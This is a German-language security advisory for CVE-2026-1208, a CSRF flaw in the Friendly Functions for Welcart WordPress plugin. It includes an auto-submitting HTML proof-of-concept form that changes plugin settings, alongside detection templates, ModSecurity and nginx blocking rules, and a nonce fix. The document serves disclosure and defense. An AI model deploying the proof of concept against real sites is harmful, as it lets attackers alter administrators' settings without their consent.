
Friendly Functions for Welcart <= 1.2.5 - Cross-Site Request Forgery zur Aktualisierung von Einstellungen
Schlüsselwörter: CVE-2026-1208, Schwachstelle in Friendly Functions for Welcart, CSRF, Cross-Site Request Forgery, WordPress-Sicherheit, WordPress-Plugin-Schwachstelle, CWE-352, Welcart-Sicherheit, Einstellungsmanipulation, WordPress CVE 2026
CSRF-Schwachstelle im WordPress-Plugin Friendly Functions for Welcart (CVE-2026-1208) – Sicherheitsfehler, der es nicht authentifizierten Angreifern ermöglicht, Plugin-Einstellungen über gefälschte Anfragen zu ändern.
Im Plugin Friendly Functions for Welcart wurde eine Cross-Site-Request-Forgery-Schwachstelle (CSRF) entdeckt, die es nicht authentifizierten Angreifern ermöglicht, Plugin-Einstellungen zu ändern, indem sie einen Administrator dazu verleiten, auf einen bösartigen Link zu klicken.
Entdeckt von: Kai Aizen (SnailSploit)
Veröffentlicht: 23. Januar 2026
CVSS-Score: 4.3 (Mittel)
CWE: CWE-352 – Cross-Site Request Forgery (CSRF)
Plugin: Friendly Functions for Welcart
Angriffstyp: Cross-Site Request Forgery zur Änderung von Einstellungen
Erforderliche Berechtigungen: Keine (nicht authentifizierter Angriff + Social Engineering)
Das Plugin Friendly Functions for Welcart für WordPress ist in allen Versionen bis einschließlich 1.2.5 anfällig für Cross-Site Request Forgery. Ursache ist eine fehlende oder fehlerhafte Nonce-Validierung auf der Einstellungsseite. Dadurch ist es nicht authentifizierten Angreifern möglich, die Plugin-Einstellungen über eine gefälschte Anfrage zu ändern, sofern sie einen Website-Administrator dazu verleiten können, eine Aktion wie das Klicken auf einen Link auszuführen.
Diese Schwachstelle ermöglicht es nicht authentifizierten Angreifern:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Die Schwachstelle liegt in der Implementierung der Einstellungsseite, wo:
Die Schwachstelle wurde an den folgenden Stellen identifiziert:
ffw_function_settings.php - Zeile 53ffw_function_settings.php - Zeile 58Der Angriff erfordert Social Engineering, um einen authentifizierten Administrator dazu zu bringen, eine bösartige Seite zu besuchen oder einen manipulierten Link zu klicken, während er in seiner WordPress-Website angemeldet ist.
Target: WordPress Admin with Friendly Functions for Welcart installed
Method: Malicious HTML page with auto-submitting form
Trigger: Administrator clicks link or visits attacker-controlled page
<!DOCTYPE html>
<html>
<head>
<title>CVE-2026-1208 - CSRF PoC</title>
</head>
<body>
<h1>Loading...</h1>
<form id="csrf-form" action="https://TARGET_SITE/wp-admin/admin.php?page=ffw-settings" method="POST">
<input type="hidden" name="ffw_setting_option" value="malicious_value" />
<!-- Add additional setting fields as needed -->
</form>
<script>
document.getElementById('csrf-form').submit();
</script>
</body>
</html>
⚠️ Warnung: Dieser PoC wird nur für Bildungs- und autorisierte Testzwecke bereitgestellt.
# Check if vulnerable version is installed
wp plugin list | grep -i "friendly-functions-for-welcart"
# Get specific version
wp plugin get friendly-functions-for-welcart --field=version
Nuclei-Vorlage:
id: CVE-2026-1208
info:
name: Friendly Functions for Welcart - CSRF to Settings Update
author: SnailSploit
severity: medium
description: |
Friendly Functions for Welcart plugin for WordPress is vulnerable
to CSRF in versions <= 1.2.5 due to missing nonce validation.
reference:
- https://github.com/SnailSploit/CVE-2026-1208
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/friendly-functions-for-welcart/friendly-functions-for-welcart-125-cross-site-request-forgery-to-settings-update
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
cvss-score: 4.3
cve-id: CVE-2026-1208
cwe-id: CWE-352
tags: cve,cve2026,wordpress,wp-plugin,csrf,welcart
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/friendly-functions-for-welcart/readme.txt"
matchers-condition: and
matchers:
- type: word
words:
- "Friendly Functions for Welcart"
- type: regex
regex:
- "(?i)Stable tag:\\s*(1\\.([0-1]\\.[0-9]|2\\.[0-5]))"
- type: status
status:
- 200
extractors:
- type: regex
name: version
group: 1
regex:
- "(?i)Stable tag:\\s*([0-9.]+)"
ModSecurity-Regel:
# CVE-2026-1208 - Block CSRF attempts to FFW settings
SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
"chain,id:2026001,phase:2,t:none,t:urlDecodeUni,\
log,deny,status:403,msg:'CVE-2026-1208 CSRF Attempt Blocked'"
SecRule ARGS:page "@streq ffw-settings" \
"chain"
SecRule &REQUEST_HEADERS:Referer "@eq 0"
# Alternative: Block if referer doesn't match site domain
SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
"chain,id:2026002,phase:2,t:none,\
log,deny,status:403,msg:'CVE-2026-1208 Cross-Origin Request Blocked'"
SecRule ARGS:page "@streq ffw-settings" \
"chain"
SecRule REQUEST_HEADERS:Referer "!@contains yourdomain.com"
Nginx-Regel:
# CVE-2026-1208 - CSRF Protection for FFW Settings
location /wp-admin/admin.php {
# Check for ffw-settings page without proper referer
if ($arg_page = "ffw-settings") {
set $csrf_check "1";
}
if ($http_referer !~ "^https?://(www\.)?yourdomain\.com") {
set $csrf_check "${csrf_check}1";
}
if ($csrf_check = "11") {
return 403;
}
# Pass to PHP handler
try_files $uri =404;
fastcgi_pass php-fpm;
include fastcgi_params;
}
Sofortiges Handeln erforderlich:
Stellen Sie sicher, dass alle Einstellungsformulare einen ordnungsgemäßen CSRF-Schutz implementieren:
// Example of proper CSRF protection in WordPress
// In your form:
wp_nonce_field('ffw_settings_update', 'ffw_settings_nonce');
// In your form handler:
function process_settings_update() {
// Verify nonce
if (!isset($_POST['ffw_settings_nonce']) ||
!wp_verify_nonce($_POST['ffw_settings_nonce'], 'ffw_settings_update')) {
wp_die('Security check failed');
}
// Check capabilities
if (!current_user_can('manage_options')) {
wp_die('Unauthorized');
}
// Process settings update
// ...
}
Forscher:
Offenlegungsprozess: Koordiniert über das Wordfence Bug Bounty Program
Diese Informationen werden ausschließlich zu Zwecken der Sicherheitsforschung und Verteidigung bereitgestellt. Jegliche Ausnutzung dieser Schwachstelle für böswillige Zwecke ist illegal und unethisch. Holen Sie immer eine ordnungsgemäße Genehmigung ein, bevor Sie Systeme testen, die Ihnen nicht gehören.
Bei Fragen oder für weitere Informationen zu dieser Schwachstelle:
Zuletzt aktualisiert: 23. Januar 2026
Die vollständige Dokumentation, Methodik und verwandte Forschung zu diesem Projekt finden Sie unter:
https://snailsploit.com/security-research/cves/cve-2026-1208/
Erstellt von Kai Aizen — unabhängiger Offensiv-Sicherheitsforscher.
snailsploit.com · Research · Frameworks · GitHub · LinkedIn · ResearchGate · X/Twitter
Gleicher Angriff. Anderes Substrat.
| Metrik | Wert |
|---|
| Angriffsvektor | Netzwerk (AV:N) |
| Angriffskomplexität | Niedrig (AC:L) |
| Erforderliche Berechtigungen | Keine (PR:N) |
| Benutzerinteraktion | Erforderlich (UI:R) |
| Auswirkungsbereich | Unverändert (S:U) |
| Vertraulichkeit | Keine (C:N) |
| Integrität | Niedrig (I:L) |
| Verfügbarkeit | Keine (A:N) |